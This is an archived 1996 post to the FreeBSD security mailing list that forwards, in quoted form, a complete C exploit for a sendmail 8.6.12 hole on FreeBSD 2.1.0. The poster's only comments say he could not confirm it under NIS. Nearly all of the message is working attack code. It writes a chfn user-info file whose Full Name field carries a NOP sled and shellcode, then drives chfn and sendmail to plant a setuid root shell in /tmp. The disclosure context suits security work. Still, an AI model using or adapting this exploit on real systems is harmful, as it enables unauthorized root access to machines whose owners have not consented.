Date: Fri, 27 Sep 1996 01:24:28 +0200 From: Stefan Zehl <sec@wg.camelot.de> To: security@freebsd.org Subject: Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD Message-ID: <199609262324.BAA24530@matrix.wg.camelot.de>
index | next in thread | raw e-mail
I could not confirm the following for FreeBSD2.1.0R while running NIS,
i will try on a non-NIS machine tomorrow, but i think it might be
of interest anyway :)
: /* Hi ! */
: /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
: /* If you have any problems with it, send letter to me. */
: /* Have fun ! */
: /* ----------------- Dedicated to my beautiful lady ------------------ */
: /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
: #include <stdio.h>
: main()
: {
: void make_files();
: make_files();
: system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
: }
: void make_files()
: {
: int i,j;
: FILE *f;
: char nop_string[200];
: char code_string[]=
: {
: "\xeb\x50" /* jmp cont */
: /* geteip: */ "\x5d" /* popl %ebp */
: "\x55" /* pushl %ebp */
: "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc3(%ebp) */
: "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd7(%ebp) */
: "\xc3" /* ret */
: /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
: /* 0xffffffc3(%ebp): */ "\x3c"
: "chmod a=rsx /tmp/sh"
: /* 0xffffffd7(%ebp): */ "\x01"
: "-leshka-leshka-leshka-leshka-" /* reserved */
: /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */
: "\xe8\xa5\xff\xff\xff" /* call geteip */
: "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4ffffff,%ebp */
: "\x55" /* pushl %ebp */
: "\x55" /* pushl %ebp */
: "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */
: "\xc3" /* ret */
: "-leshka-leshka-leshka-leshka-" /* reserved */
: "\xa0\xcf\xbf\xef"
: };
: j=269-sizeof(code_string);
: for(i=0;i<j;nop_string[i++]='\x90');
: nop_string[j]='\0';
: f=fopen("user.inf","w");
: fprintf(f,"#Changing user database information for leshka\n");
: fprintf(f,"Shell: /usr/local/bin/bash\n");
: fprintf(f,"Location: \n");
: fprintf(f,"Office Phone: \n");
: fprintf(f,"Home Phone: \n");
: fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
: fclose(f);
: f=fopen("hack","w");
: fprintf(f,"cat user.inf>\"$1\"\n");
: fprintf(f,"touch -t 2510711313 \"$1\"\n");
: fclose(f);
: }
CU,
Sec
--
Jeder Tag an dem du nicht lächelst, ist ein verlorener Tag. (C. Chaplin)
Hiroshima '45 Tsjernobyl '86 Windows '95
Black holes are where GOD is dividing by zero
home |
help
Want to link to this message? Use this
URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199609262324.BAA24530>